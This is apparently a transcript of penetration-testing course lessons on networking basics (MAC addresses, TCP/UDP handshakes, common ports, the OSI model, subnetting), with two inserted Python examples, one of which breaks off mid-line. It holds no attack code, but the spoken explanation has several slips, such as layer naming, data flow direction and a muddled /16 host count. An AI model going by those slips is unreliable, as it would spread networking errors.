All right, so we're going to move down a layer here and talk about layer two. Remember, IPv4, IPv6, IP addresses as a whole, that is layer 3; we're talking about routing. Here in layer 2 we're going to be talking about a MAC address, or a physical address. MAC stands for media access control, and that is identified here in our ifconfig as this ether here. So we can think of this as our physical address and a way that we communicate when we are using switches. Switches communicate over this physical address; this is kind of how they know what device is what. So what we say here is, if we have a device, say you just built a computer and you're installing your network interface card, or your NIC, you're going to plug that in and you're going to have a MAC address for that NIC. Your cell phone, that's going to have a MAC address. Anything that's using a network interface is going to have a MAC address. So these MAC addresses are important because they utilize layer 2, or switching, and they are how we communicate over switches. Now there's something to be noted briefly about MAC addresses: MAC addresses have identifiers. As you can see here, this MAC address has six different pairs of two, right? What we can do is take the first three pairs, just copy this, go out, and try to put it into a MAC address lookup. For this one, this is just going to be VMware; I'm not sure if it's actually going to come up, but I'm going to go ahead and paste it
and see what happens. You can see that the vendor actually shows up as VMware. So the first three pairs here are identifiers, and we can identify what we're up against. If you've ever looked in your house, looked at your network and you're trying to find a device, you see the IP address but the IP address doesn't really help you identify it; you might see something along the lines of a MAC address, because your home device, say your router, might also be what's called a layer 2 slash layer 3 device, meaning it's doing switching and routing for you, and it'll also know the MAC address of that device. So you can take the first three pairs here, put those into the Google machine, and see if you can identify what that device is. If I was unsure, this didn't have a hostname or device name, I could just reach out and say, okay, well let me look these up; maybe it'll give me an inkling. It's not going to tell me the exact device, but if I know it's running VMware then I can say, oh, that's my host machine running, or if it's related to Texas Instruments or something, maybe I know that device in my house. So this is just a quick way to look up devices and know about them. The other thing that you need to know here is just that, again, MAC addresses: layer two, related to switching. I'm just trying to repeat this and get this into your head. So that's all we need to know from this lesson, and I'll catch you over in the next lesson.

All right, so now we're moving into layer 4, which is the transport layer of the OSI model, and we're going to talk about what is TCP and what is UDP. So we'll type that in here: TCP vs UDP. TCP is what is known as the Transmission Control Protocol, and you could think of that as a connection-oriented protocol. We also have UDP, which is the User Datagram Protocol, and this is a connectionless protocol. So when we have these two protocols, one is best suited when it comes to high
reliability: that's TCP. TCP is connection-oriented; we want to make a connection, we need high reliability. So you can think of something like a website, which is HTTP or HTTPS, or you can think of something like SSH or FTP, the File Transfer Protocol; those all utilize TCP. When you think about UDP, you might think about something like a streaming service, that's connectionless, or DNS is connectionless, or Voice over IP is connectionless. And this comes into the importance of scanning. Scanning is super important; we're going to be scanning both TCP and UDP as a penetration tester. Don't worry about scanning right now; when we get into the scanning section this will make a lot more sense, but we need to know what TCP and UDP are and define them broadly. The most commonly used protocol that you're going to be scanning is going to be TCP. Now, TCP works on what is called a three-way handshake. If we look at the three-way handshake, it's going to look something like this: we're going to first send out a SYN packet, then we're going to receive back a SYN-ACK packet, and finally we're going to send an ACK packet. Now, how does this work? You could think of this as an interaction. Let's say you have a friend or a neighbor, and you go to your neighbor and you say hello; that's a SYN. Now, SYN-ACK is going to be the response; it's going to say, hey, SYN, I acknowledge you. That's your neighbor waving hello back, and then you know you are good to go start a conversation. So that's the acknowledgement. Now, when we think about this in terms of ports: a port is an item that can be open on a machine. It's a way to communicate with certain protocols. For example, if you think about HTTP, that's over port 80.
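As an added example (not code from the course), a small Python tracker that pairs SYN, SYN-ACK and ACK into completed three-way handshakes and lists the SYNs that were never answered, run over a constructed packet list that stands in for the Wireshark capture shown next. Real TCP matching also checks sequence numbers; this illustration keys on the address/port 4-tuple only, and the port-to-service table is the lecture's own list of common TCP ports.

```python
# Added example, not the course's own code: replay a constructed packet list
# through a tracker that follows the SYN / SYN-ACK / ACK three-way handshake.
from dataclasses import dataclass, field

# Service names for the common TCP ports the lecture lists.
WELL_KNOWN_TCP = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 80: "http",
                  110: "pop3", 139: "smb", 143: "imap", 443: "https", 445: "smb"}

# Constructed sample capture: (src, sport, dst, dport, flags). The first three
# packets mirror the 192.168.57.139 -> 74.125.21.155:443 exchange from the
# lecture; the rest is made up, including one SYN that never gets answered.
SAMPLE_PACKETS = [
    ("192.168.57.139", 50311, "74.125.21.155", 443, "SYN"),
    ("74.125.21.155", 443, "192.168.57.139", 50311, "SYN-ACK"),
    ("192.168.57.139", 50311, "74.125.21.155", 443, "ACK"),
    ("192.168.57.139", 50312, "10.0.0.5", 80, "SYN"),
    ("10.0.0.5", 80, "192.168.57.139", 50312, "SYN-ACK"),
    ("192.168.57.139", 50312, "10.0.0.5", 80, "ACK"),
    ("192.168.57.139", 50313, "10.0.0.9", 22, "SYN"),   # no reply in the sample
    ("10.0.0.5", 80, "192.168.57.139", 50312, "ACK"),   # data-phase ACK on an established flow
    ("10.0.0.7", 40000, "192.168.57.139", 445, "ACK"),  # stray ACK with no prior SYN
]


@dataclass
class HandshakeTracker:
    # A flow is keyed as (client, client_port, server, server_port), i.e. the
    # direction of the SYN, so the server's SYN-ACK maps onto the same entry.
    pending: dict = field(default_factory=dict)      # key -> "SYN" or "SYN-ACK"
    established: list = field(default_factory=list)  # keys that completed all three steps

    def feed(self, src, sport, dst, dport, flags):
        if flags == "SYN":                      # step 1: the client says hello
            self.pending[(src, sport, dst, dport)] = "SYN"
        elif flags == "SYN-ACK":                # step 2: the server waves back
            key = (dst, dport, src, sport)      # reverse direction -> client-side key
            if self.pending.get(key) == "SYN":
                self.pending[key] = "SYN-ACK"
        elif flags == "ACK":                    # step 3: the client confirms
            key = (src, sport, dst, dport)
            if self.pending.get(key) == "SYN-ACK":
                del self.pending[key]
                self.established.append(key)
        # ACKs outside a handshake (data phase, or no prior SYN) are ignored here.

    def half_open(self):
        """Flows whose SYN was never completed. A burst of these from one source
        is what a half-open scan or a filtered port leaves behind, so a defender
        counts them per source rather than per flow."""
        return [k for k, state in self.pending.items() if state == "SYN"]


def service_name(port: int) -> str:
    """Port number -> name from the lecture's list, or 'tcp/<port>' if unlisted."""
    return WELL_KNOWN_TCP.get(port, f"tcp/{port}")


def summarize(packets):
    """Replay a packet list and report established vs half-open flows by service."""
    tracker = HandshakeTracker()
    for pkt in packets:
        tracker.feed(*pkt)
    fmt = lambda c, cp, s, sp: f"{c}:{cp} -> {s}:{sp} ({service_name(sp)})"
    return {
        "established": [fmt(*k) for k in tracker.established],
        "half_open": [fmt(*k) for k in tracker.half_open()],
    }


if __name__ == "__main__":
    for kind, flows in summarize(SAMPLE_PACKETS).items():
        print(kind)
        for flow in flows:
            print("  ", flow)
```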
If you think about HTTPS, that's over port 443. There are a lot of different protocols, and there are 65,000-plus ports that can utilize these protocols, so everything related here has to do with these ports. Now, let's say that you want to connect to port 443 on a website. You're going to send out a SYN packet to that website; you're going to say, hey, I want to connect to you on port 443. If 443 is open and available for connection, they're going to say, hey, you can go ahead and connect to me, and when you want to actually establish that connection you're going to send that acknowledgement packet back. Now, let's make more sense of this. Let's go ahead and open up a tool called Wireshark. This is built into Kali Linux; I'm just going to type in wireshark, and I'm going to provide an ampersand here just so I have shell access if I need it, in the background. All I'm going to do is capture packet data. This is going to be listening in on my NIC, and it's going to say, hey, what's he doing, let's capture all that data. So I'm going to start a capture here. You're going to start to see a bunch of traffic coming through; you can see the different protocols here, you can see UDP is coming through right now, but we're going to go establish a TCP connection. So let's go out to the World Wide Web. I've got Google up, and I'm just going to refresh Google. You're going to see a lot of traffic start coming through, so I'm going to go ahead and just stop this right here. Look at all the data packets that get sent when you're using your computer; this is what's going on in the background, you don't even think about it. So we can see some SYN, SYN-ACKs there, those are in the gray. Let's see if we can find a good one. Okay, so here is one right here; actually, let's find a better one. We're going to come down to here, and okay, so here we are. Our source IP, this is 192.168.57.139, and we're going out to a destination of 74.125.21.155
We're saying, hey, I've got this port here, I want to connect to your port, so port 443; this is a web page. We're sending a SYN packet. If that port is open and available for connection and communication, what's going to happen back is that IP address is going to say, hey, here I am, I'll allow you to connect on this port. And if we make that final connection, we're going to go ahead and send the ACK packet back, which is right here; it's going to say ACK. So that is the three-way handshake. Please do remember this; it's going to come back into play when we get into scanning, and we'll talk about stealth scanning and how we modify the three-way handshake to actually do some scanning. So that is it for this lesson. I will catch you over in the next one.

All right, so before we go into the OSI model I do want to talk about some common ports and protocols. Since this is a refresher, most of these should be pretty familiar to you. I'm going to run through them pretty quickly and just talk briefly about each of these common ports. The reason I've listed these is because they are things that we'll see quite often as a penetration tester, and as we're going through the course, if one of these shows up, it's something that just rings a bell: you see a scan come back and you see port 21, you just think, ah yes, FTP; or you see port 80, you think, ah yes, HTTP. So you've got to start training your mind by memorizing these ports, so that when we get into our scanning, which again we haven't covered, but when we get there and we see what ports are open on a machine, we're going to have these common ports memorized. On the TCP side we've got FTP. FTP is the File Transfer Protocol. You're going to see this in some assessments, and you're going to see this a lot when we do something called capture the flag, where we run through some test machines; you'll see FTP open quite a bit. So FTP, File Transfer Protocol, all that means is we can log into this server, we can put a file
or we can get a file off the server. Now, SSH and Telnet kind of play hand in hand. Telnet is the ability to log into a machine remotely; SSH does the same thing, the only difference is SSH is the encrypted version of that. So with Telnet you are in clear text and with SSH you are encrypted. SMTP, POP3 and IMAP all relate to mail. We're not going to worry too much about mail in this course, but you might see it come back up at some point, so just remember your 25, 110 and 143. DNS: DNS is a way to resolve IP addresses to names, and we can take a quick look at that. If we go back to our Kali machine, say we're at Google here; we've got Google up, but the computer doesn't really know what Google is. The computer's just using nice text like google.com for us humans. What's going on on the back end is google actually resolves to an IP address, and the IP address is how the computer knows to get back and forth. Because we don't want to sit there and type in IP addresses, this DNS, or Domain Name System, has been implemented for us: we type in google.com, and on the back end it knows, hey, I want to go out to 17 179 10 22 34, whatever it is in reality. This is just a quick way for the computer to relate to a human, and the human to have easily readable access to some of this stuff. Going back to our PowerPoint, we have HTTP and HTTPS; that is a website, just what you saw there. Mostly everything is on 443 now, or HTTPS; the HTTP on port 80 you'll see sometimes. Remember, that is the non-secure version of the protocol: HTTPS is encrypted, HTTP is not encrypted and not secure. So lastly, SMB, ports 139 and 445.
Originally it was just 139; in the later versions of Windows they put on 445. You're going to see these ports a lot; this is probably the most common port you're going to see as a pen tester. These relate to file shares. You might also hear this called Samba, so there are a few names for it, but when you think of SMB and you see 139 or 445, think of file shares. From a pen tester perspective, you've got to think about all the crazy exploits we've had regarding SMB. The most recent one as of this course was the WannaCry virus, right? So you had the WannaCry virus; EternalBlue was what it was built off of, or MS17-010 was the official term of that exploit. That exploit utilized an SMB exploit to navigate through networks, so it became very vicious very quick, because SMB is open so frequently on networks. Now, on the UDP side we also have DNS over here; DNS is both a TCP and UDP protocol. We also have DHCP. When it comes to IP addresses, DHCP associates you with an IP address kind of at random. The opposite of that is what is a static IP address. So with DHCP you plug into your network, say your home network, and the internet just fires up; guess what, probably DHCP on the back end. It just picks a number within a range, says, hey, here's your IP address, I'm going to let you lease that out for eight hours or a day or a week or however long the timing is set for, and that IP address is yours. The opposite of that, again, is static. You could say, hey, I want a static IP address, and anytime I plug in with this specific computer, go ahead and give it this IP address. So how are we going to know that? Most likely the MAC address, right? From layer 2 it's going to know layer 3 and how to assign it. So again, DHCP should be pretty familiar to you. We've also got TFTP on port 69, which is the trivial FTP, and it utilizes UDP instead of TCP. And we also have SNMP, which is the Simple Network Management Protocol. You will encounter SNMP occasionally on networks, not always,
but when we do encounter it there may be some information to be gathered, especially if there are strings being used that are community or public strings. We'll worry about that when we encounter it, but you'll probably see it again in this course. So that is it for this video. We're going to go ahead and move on to the OSI model and tie all this together, then we'll get into a little bit of subnetting, and we'll end this with a refresher on networking, a final video on networking. I'll see you over in the next video.

All right, so this whole time we've been talking about networking, and I've been throwing terms at you, and every time I throw a term at you I try to use the respective layer for it. So you've heard me say layer two, layer three, layer four, and those all correspond with what is called the OSI model. Now, if you're ever in a network interview, or if you're ever talking to somebody who has experience in networking, or even if you're on the help desk taking tickets, knowing the OSI model is incredibly helpful, and people will just throw layers at you. Especially the people who have been in the field for quite some time might just say layer 2 instead of a switch, or they might say layer 3 instead of a router. So I'm going to discuss the OSI model really quickly, give you a mnemonic on how to remember it, and talk about some of the concepts within it and how to troubleshoot down it as well. I picked this up from Keith Barker a long time ago, great trainer by the way, and this is the mnemonic: we're going to go P D N T S P A, and this stands in my head for Please Do Not Throw Sausage Pizza Away. Again, that is Please Do Not Throw Sausage Pizza Away. So I'm going to put numbers corresponding to the layers in front of it here, and we're going to go ahead and type these out one by one. On the first layer here we've got what is called the physical layer, and you can think of your physical layer as data cables, like your Cat6 cables, stuff like
that, something you might plug in, right? That is the physical layer. We've already talked about layer two quite a bit: layer two is the data layer, and that is our switching, right, and also our MAC addresses. Going down the list, we've got the network layer, which is IP addresses, also routing. The fourth layer is the transport layer, which is TCP, UDP, which we have talked about as well. And the last few: we've got the session layer, which is just session management; you don't really have to worry too much about this one. Six is the presentation layer. This should be familiar to you, because think about WMV, JPEG, movie files; that's what your presentation layer is, so media. And then lastly we've got the application layer, which is like HTTP, SMTP, your applications that you utilize, right? So we've got this laid out here, and you might be asking, why is this important? Well, again, when we say something like my home router is a layer 2/3, that means it does switching and it does routing, right? You might think of this in another way as well: you might be asked to troubleshoot. Something to talk about too with the OSI model is, when we receive data, we receive data down this physical layer all the way down to the application; when we transmit data, it goes out the application layer down to the physical. When we're troubleshooting this, it is always best to start with the physical and go down to the application level. Okay, so say you're working help desk and you get a phone call, and somebody says, you know, my internet's not working, help me. Well, what's the first thing you're going to do? Are you going to ask some application-level questions? Yeah, probably not. You might say, hey, can you look at the back of the computer, do you see the cable plugged in? Oh, the cable is plugged in. Okay, well, do you see where the cable's plugged in, is there a blinking light, is that blinking green by chance? Okay, we're checking the NIC
right? And then we might ask them, you know, do they have an IP address, what's going on, all the way down, and then we troubleshoot all the way down to layer seven. So we wouldn't start on layer seven, right? We would start from the basics and move down. So it's important to know this. This isn't a help desk course by any means, but it's super important to know this, especially if it's been a while since you've seen this network stuff, or even if this is new to you, because the OSI model is commonly referred to. Even as a pen tester I get all kinds of layer two, layer three talk, and you will be sitting in meetings with network engineers, with people who are very, very smart about this stuff, and they're going to throw all this lingo at you. So if you know this lingo it really, really benefits you; or else you're just going to sit there and wonder what the heck they're talking about. Hopefully this is a quick, informative method for you, and again, remember: Please Do Not Throw Sausage Pizza Away. That's the easiest way that I remember it. You can make up your own mnemonics if you want; people have other things as well. If you've got a favorite mnemonic, please feel free to comment down below and tell me your mnemonic as well; I'd love to hear some of these other ones. So let's go ahead and move on into subnetting, and then we'll start moving into other fun parts of the course.

Let's talk about subnetting. Subnetting is important in networking; you hear about it all the time. You even hear people perhaps freaking out; I know I freaked out when I heard that I had to do it for exams like Network+ or CCNA. I feel like there are a lot of complicated methods out there for subnetting, but there was a method that was shown to me in the middle of my career and it just blew my mind. It's a really, really fast subnetting method, and I really want to break down for you what subnetting is, why we do it, and then show you the methodology behind it. So if we want to talk about subnetting, if we just come in
here and just do an ifconfig and we look at our ip address right we have our inet which is our ipv4 and you can see here too we have this netmask this is also known as a subnet mask or a subnet and it just says 255 255 255.0 it doesn't really tell us a lot if we don't know much about it but this is what a subnet looks like and we can think of subnets in ones and zeros it's all bits right so we've got eight bits here just like an ip address ipv4 same thing eight bits eight bits eight bits and another eight bits and we've got ones and zeros if all the ones are switched on we've got 255 if none of the ones are switched on we've got zero and depending on how those ones and zeros are switched on or off determines a lot of things for us and that's why this net mask is important now attached to your resources for this course i've created an excel sheet that i think will be useful so if we look at the excel sheet here is the cyber mentors subnetting sheet and let's talk through this it looks like a bunch of numbers and it might look crazy for you and we're going to talk about how this breaks down how the bits break down and then how i would write this shorthanded for an exam or test or just something that i do on a day to day basis so first let's talk about the bit so come to the bits tab here and we have our eight bits right we can count this across and there's eight here on the count you can see that and it starts with 128 and descends down to one you just keep cutting it in half right so 128 64 32 16 8 whatever what's more important is why we get to these numbers so if we have a one switched on here it adds to the value when all the ones are switched on it equals to 255. 
You see all the ones switched on here. If we were to highlight over all this, come down to the sum, you see the sum is 255. That's all this formula is doing here. So if we were to come through, and you see all the zeros here, nothing's flipped on to actually turn any value on here. How this actually works is the switch has to be on in order, right? So if we were to switch on another bit we'd have to switch it on here, and we'd have to switch another one on here. We couldn't just come down here and switch it on here; it wouldn't make sense, it doesn't work that way, not with subnetting. So we're going to take these back off and just show zeros again, but you see how the values change. If, for example, we had this network, and you saw the default, and I'm showing you the 255.255.255.0, the standard here, because that is what's known as a slash 24 network. That's very, very common, and it's very common because it's used mostly in households and small businesses, and it's done this way because of the amount of hosts that it allows. Now if we talk about the hosts, you can see that I have here two to the eighth power. Why do I have that? Well, we actually go by how many bits are switched off, or how many hosts are available to us. So if a host here, or a bit, was switched on, then we lose the amount of hosts we have available to us and this subnet gets smaller and smaller. Now don't worry too much about the ones and zeros; it's going to make a lot more sense when we stop talking in these binary terms. I just kind of want to break down the math behind it first before we make it really, really simplistic. So again, we're talking about what's called the slash 24, or "whack 24", network, and it's so standard because of the hosts, again, 256.

Think of all the devices in your house. You have cell phones, you probably have computers, you might have like a Roku or Amazon Fire or something along those lines, you might have smart TVs or smart watches or something that connects to the internet. Well, again, they're all connecting through NAT, right, and going out, but the amount of hosts that you can have on your private network really depends on the subnet mask and how you set it. So we have this class C that you saw before, the 192.168.1, or .0, or however you wanna have it, right? Well, it allows us to have 256 when we have a subnet of slash 24. So that's very common for a household. It's also common for a small business; maybe there's a printer, some few devices in there, but they're never going to get over this 256 hosts, okay? So when we come to the subnet cheat sheet, let's break this down a little bit differently. So we have our hosts here. Let's start with the slash 24 we just were at, and you saw that there is 256 available hosts. As we start turning off bits, okay, we turn off a bit here, we turn off a bit, keep going down the list, the hosts start getting bigger, and that just corresponds here. We have a slash 24, and the only reason I'm saying 24 is I'm counting the ones across, right? So we've got 24 bits switched on. If we had 23, okay, it gets bigger and bigger and bigger. Now let's stay away from the ones and zeros; I think it's a little bit complicated. The better way to think about this is to look at the subnet mask down here, and I'm going to replicate this and then we're going to come back to it. So what I do here is, we can have a possibility of 32 bits switched on, right? So I'm just making a new tab, and I'm just going to go over here and I'm going to hit control and drag this across until it hits 8.
Okay, and then I'm gonna do the same thing with nine, I'm gonna drag it across. All I'm doing is just making, really quickly, 32 placeholders, and I'm just emulating here if we had the possibility of 32 different switched-on bits. So imagine one bit is switched on, imagine all 32 bits are switched on; that's the possibilities here, right? So always, for sure, we're going to have an amount of hosts and we're going to have a subnet mask, okay? So we'll just call it subnet. There we always start here with 128, just like the bits that you saw. You saw the 128 start on the bits; let's just start also with 128. Now, as you saw, every bit that's switched on, remember when we switch a bit on over here it starts decreasing, so we're going to decrease for the bits that are switched on: 64, 32, 16, 8, 4, 2, 1. You come over here, and what I like to actually do is I like to just add these numbers together, and you can see 128 and 64 is 192, and then you can add these two together so you get 192 plus 32. You just add diagonals, the way I actually always do it, so 224, 240, 248, 252, 254 and 255. Now what does that correspond to? It corresponds to the possibilities of the bits being flipped on, right? So this looks just like what you see here, same deal, and if you had a one underneath of it, okay, then you got 128. If you've got another one underneath of it, well guess what, you've got 128 plus 64 which is 192, and this number keeps growing. Why is this important? This is still all ones and zeros, right? Well, let's start thinking about it. If we have a slash 24 network, we've got 24 bits turned on; our subnet mask is 255.255.255.0.

If we had a slash 16 it becomes 255.255.0.0. Why? Where are these changes coming from? Let me show you this, okay? For a slash eight, I'm just tying this in, just this right here, well, this is coming from the number of bits that are turned on. Eight bits turned on, we've got 255 and the rest are zeros. You got another eight bits turned on, 255.255, the rest are zeros. Come down to the slash 24, which is that really common subnet that you see, and you've got 255.255.255.0. Now this is very common, okay? Let's go back to the cheat sheet now, and you can see that I've got x as a placeholder in the subnet. So what I'm saying here is you look at this list and you say I've got a slash one. Well, for this whole area here from one to eight, the placeholder is gonna hold in place of this x. So for a slash one, if I've got 128 then guess what, it's going to become 128.0.0.0, because that's how it would be, and if you were to turn on just one bit here and make all of these zeros, guess what, just the 128 would be on, the rest would be zeros, okay? If we had a slash 14, okay, so the 255 automatically flipped on; you have a slash eight already, you pass through it, okay, so you're starting on the second iteration here. Slash 14 corresponds down here to 252, so you'd have a 255.252.0.0. So all this is is placeholders. Let's go back to the sheet here. So I make this quick and dirty list; this is what I write out when I'm just writing out something quick for an exam. I'll write out 1 through 32, I'll put the hosts here, and I'll put the subnet here. So again, if we know that once we cross through 8, 16, 24, 32 that has a 255 in front of it, all we've got to do then is we'll say slash 27. Well, we've come through three columns, then I know for sure that we've got 255.255.255.-something, right? You see the slash 27, you come down here, the subnet would be 224. Say 28, okay, 255.255.255., look at the 28, you've got a .240.
And this is going to be confusing. Subnetting is not necessarily easy; once you get the chart down it makes a lot more sense. So let's start piecing some more things together. When I say that I've got hosts, now the hosts I'm showing you only correspond to these first rows, but it's very common, or very useful, just to know this number right off the bat. Now if you look at the cheat sheet, what you can do here is you just know that you start with a 1, or you start with the 128, you go down, but every time you go up you're doubling. And why are we doubling? Do you remember from the bits part, every time a bit is turned off? So as we go up a number we take it to the next power. So we've got eight bits turned off, we take two to the eighth power, it's 256. Well, here you go, look, come through here, 256, we go to the ninth power, 512, to the 10th power, 1024. It just keeps doubling, okay? That's all you got to think about in your mind is it keeps doubling. So on an exam, for example, you might have something like how many hosts could be potentially in a slash 20 network, and you come to your cheat sheet that you made, or you have in your head, and you say well, 4096, and then we'll get to this in a minute but we have to subtract two, so 4094 potential. And why is this all important? What do we even care about any of this? Why am I rambling on? Well, you need to know based on the network, okay? The slash 24 is great for a small office, home network, however you want to have it, but what if you're a large enterprise? Maybe you have thousands of devices, okay? Maybe you want a slash 16 network; that might make more sense for you. Or you even see some with a slash 8 network; it just depends on how big the company is. The larger the company, the greater chance that you're going to see that they're not using slash 24, or they could even have subnetted segments of their network where, say, they have just telephones and they've got 500 employees and 500 telephones, they might just have one slash 23 network for nothing but telephones, because that's the amount of hosts that fit in there. So what we're after with subnetting is how many hosts can we fit and what is the mask that's behind it. So those are questions you might be asked in an exam, and these are questions that you're just going to see when you're given addresses. Say you're doing a pen test for a client. You might be given something like this: you might be given an IP address, 192.168.1.0/24, okay? And immediately in your head you're like, oh, slash 24, that's standard, there could be up to 256 hosts, or 254 hosts or devices, in this network. But if they gave you something like 192.168.1. then you might look at your little chart and say 4094 hosts; remember, we're going to subtract two, 4094 hosts in this network. Now I know if I'm scanning this I'm up against a lot more devices potentially than I am in this, okay? So when a client gives you your subnets they might just write it out like this, and depending how big your client is might depend on how big their subnets are for you. For example, I just pen tested a client that was a slash 16 all the way across, and it looks something like 10.1.0.0/16, okay? And your subnet mask for that would be something like 255.255, and how does this come into play? Well, every time you have a 255 that number is locked in place; that's another way to think about this. So that 10 is always locked down, this 1 is always locked down, the rest of the bits are fair game, meaning we could have 10.1.1.0, .1, .2, .3; we could actually have a zero here, 0, 1, 2, 3, 4, and that's how this number for, like, a slash 16 gets so big, because you have 10.1.0.0 through 255 on the possibilities, which equals 256 hosts, okay? For one range you get 256.
Well, imagine you have to do that 255 other times, right, and that number gets substantially bigger here, and then if you were to have a slash 8 then of course it gets bigger and bigger. So what you need to realize are a few things here. We have these addresses and you see the slash one, slash eight; again, we call them "whacks". Whack 24 is going to be very common, I would say whack 16 is probably your next common, you might see some weird subnetted networks like this, but typically it's slash 24, 16. Now your network ID is typically what is known as your first address and your broadcast ID is known as your last address. This is not always the case, but it is very common, and let me log back into this Kali machine here and I'll show you. So we have our IP address 192.168.57.139 and we've got a netmask of 255.255.255.0. What does that tell you from what we just learned? That tells you we have a slash 24 network, okay? This is a common network; there are potentially 254 hosts. Why do I keep saying that? Why do I keep subtracting two? Well, we've got a network ID and a broadcast ID, or broadcast IP here. Well, what we need to know is we are .139; we could be anywhere from .1 to .254 within this network. That's our 254 possibilities. This zero means we have the flexibility to be any IP address range from 1 to 254, usually. Usually a .0 for this IP here and a .255 make up your network ID and your broadcast IP, okay, usually. So if we were to say something along the lines of, let's go back to this Excel document, and we were to say something along the lines of this: let's say that we have a slash 24 network and we want to know how many hosts, we want to know what our network ID is and what our broadcast ID or IP is, okay? We would say, okay, and we'll give it one more, we'll say it's a slash 24 and the IP starts with 192.168.1.0, okay, or we can even write it like this: 192.168.1.0/24. Delete this, and we'll say what's our subnet mask, what's our hosts, what's our network, what's our broadcast. So subnet: you come to your cheat sheet, you say okay, 24, I already know that I need to be filling in this area here on the x, so I'm just going to come in 255.255, what's the x, well we know to come down this row, 255 here, .0, okay? And then we've got hosts, so I'm just going to expand this a little bit. We've got the hosts, okay, hosts are right here: 256 hosts potentially, 254 though, because we always subtract two from the host total. So our network ID is usually the first address available to us, which is 192.168.1.0; the broadcast is 192.168.1.255, meaning available to us is anything from .1 to .254. Let's take a look at something else that's a basic example. Let's do like a slash 28. Let's say we got 192.168.1.0/28. Now what? Well, we've got 16 hosts here, okay? So our subnet is then gonna fill in 255.255.255.x, right, because we're in this row. Slash 28 says it's going to be a 240 when we drop down to the subnet mask. I'm going to make this a little bigger. How many hosts? 16 minus 2, we have 14 hosts, okay? So the first non-host would be 192.168.1.0, again, still the same thing, first address; last address is going to be what? 192.168.1.15.
That makes sense: 0 to 15 is 16 addresses, usable space is 14 because we take out the network and the broadcast. Now you could see something like this, and then guess what, you're segmented, so because you're only using this little bit of space you can then in turn have something like this, 192.168.1.16/28, and then it starts the same way. Your subnet mask is actually the same because you're using a slash 28; you come through, you can just copy and paste that. The hosts are still the same. What changes here? Well, your first address, 192.168.1.16, and then your last address, which is 192.168.1.31. So because this is smaller on the slash 28 side we can actually have multiple networks within, like, say a .1.0, .1.16, .1.32; you get multiple little networks here with only a small amount of hosts. So maybe you have just a few servers in this range, and you have like servers A, B and C, they go into 28, and then you have another one of servers D, C and E, or D, E and F, however you want to say it, and you have more in that range, okay? So you can subnet this out into different things, and when we see subnets we see all kinds of stuff. We can see phones, servers, user computers, wireless, all different sort of things. Some companies get really specific with their subnetting. Now let's try one more. Let's say we have a slash 23.

Now I want to put in 192.168.1.0/23, but that would be wrong. Why would this be wrong? This is actually going to be a zero and I'll show you why in a second. So we're no longer locking in this number anymore, right? When we get below the slash 24, the 255 all the way across for three of them, guess what, we now have the ability to change this number other than what's locked in. So let's do a .0; we'll talk about why. Let's hit enter here. So a subnet on a slash 23, well, we're going to do a 254, which is going to be the placeholder of the x here; we're going to come in and say 255.255.254.0, and now again we're not locked in. So remember, this 255 would lock in this .1; that doesn't happen anymore. So we've got 255.255.254.0. We're actually going to start at zero here and we're going to say the number of hosts that are possible: it's 510, okay, 512 minus 2. We'll say our network ID is 192.168.0.0 and our broadcast would then be 192.168.1. Why? Okay, so we have the possibility now that we're spanning two ranges. We've got 510 hosts in this network, okay, and we have the ability to go between zero and one; we've got two options now, zero and one. So if we were to say another network, if we wanted to get to like a two, we'd actually have to say 192.168.2.0/23. It would be the same subnet mask, same number of hosts, but then this would be 192.168.2.0 to 192.168.3.255. Again, there's 510 possible hosts in between this, right, because you got to think 0.1, 0.2, 0.3 all the way through 254, and again 1.1, 1.2 all the way through 254, so that equals 510.
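The cheat-sheet method walked through above (the 128/192/224/240 column, a 255 locked in for every eight bits crossed, two to the power of the bits switched off minus two, and the network ID and broadcast as first and last address) written out as Python. This is an added example, not code from the course or its resources; the function names are my own, and the cross-check against the standard library plays the role of the online calculator mentioned in the video.

```python
"""Cheat-sheet subnetting: mask, host count, network ID and broadcast from
an address in CIDR notation, worked the same way as on the whiteboard."""
import ipaddress

# Bit values across one octet: 128, 64, 32, 16, 8, 4, 2, 1
BIT_VALUES = [128 >> i for i in range(8)]
# Diagonal running sums: 128, 192, 224, 240, 248, 252, 254, 255
MASK_COLUMN = [sum(BIT_VALUES[: i + 1]) for i in range(8)]


def subnet_mask(prefix):
    """Dotted mask for /prefix the cheat-sheet way: each full column of
    eight bits crossed (/8, /16, /24) locks a 255 in place, the leftover
    bits select the 'x' octet from MASK_COLUMN, and the rest are zeros."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    full, rest = divmod(prefix, 8)
    octets = [255] * full
    if rest:
        octets.append(MASK_COLUMN[rest - 1])
    octets += [0] * (4 - len(octets))
    return ".".join(str(o) for o in octets)


def host_count(prefix):
    """(total addresses, usable hosts): 2 to the power of the bits switched
    off, minus two for the network ID and broadcast. A /31 or /32 has no
    room left to subtract, so usable is reported as 0."""
    total = 2 ** (32 - prefix)
    usable = total - 2 if prefix <= 30 else 0
    return total, usable


def _to_int(dotted):
    """Dotted quad -> 32-bit integer, validating each octet."""
    parts = [int(p) for p in dotted.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("bad IPv4 address: %s" % dotted)
    value = 0
    for p in parts:
        value = (value << 8) | p
    return value


def _to_dotted(value):
    """32-bit integer -> dotted quad."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def describe(cidr):
    """Solve 'address/prefix' like the examples in the video."""
    addr_str, prefix_str = cidr.split("/")
    prefix = int(prefix_str)
    mask = subnet_mask(prefix)
    mask_int = _to_int(mask)
    # ANDing with the mask keeps the locked octets and clears the host bits,
    # which is why 192.168.1.0/23 really starts at network 192.168.0.0
    network = _to_int(addr_str) & mask_int
    broadcast = network | (~mask_int & 0xFFFFFFFF)
    total, usable = host_count(prefix)
    return {
        "mask": mask,
        "total": total,
        "usable": usable,
        "network": _to_dotted(network),
        "broadcast": _to_dotted(broadcast),
        # the usable range is everything strictly between the two
        "first_host": _to_dotted(network + 1) if usable else None,
        "last_host": _to_dotted(broadcast - 1) if usable else None,
    }


def matches_stdlib(cidr):
    """Cross-check the hand method against Python's ipaddress module, the
    way the video double-checks against a CIDR calculator website."""
    ours = describe(cidr)
    net = ipaddress.ip_network(cidr, strict=False)
    return (ours["mask"] == str(net.netmask)
            and ours["network"] == str(net.network_address)
            and ours["broadcast"] == str(net.broadcast_address)
            and ours["total"] == net.num_addresses)


if __name__ == "__main__":
    for example in ("192.168.1.0/24", "192.168.1.0/28", "192.168.1.16/28",
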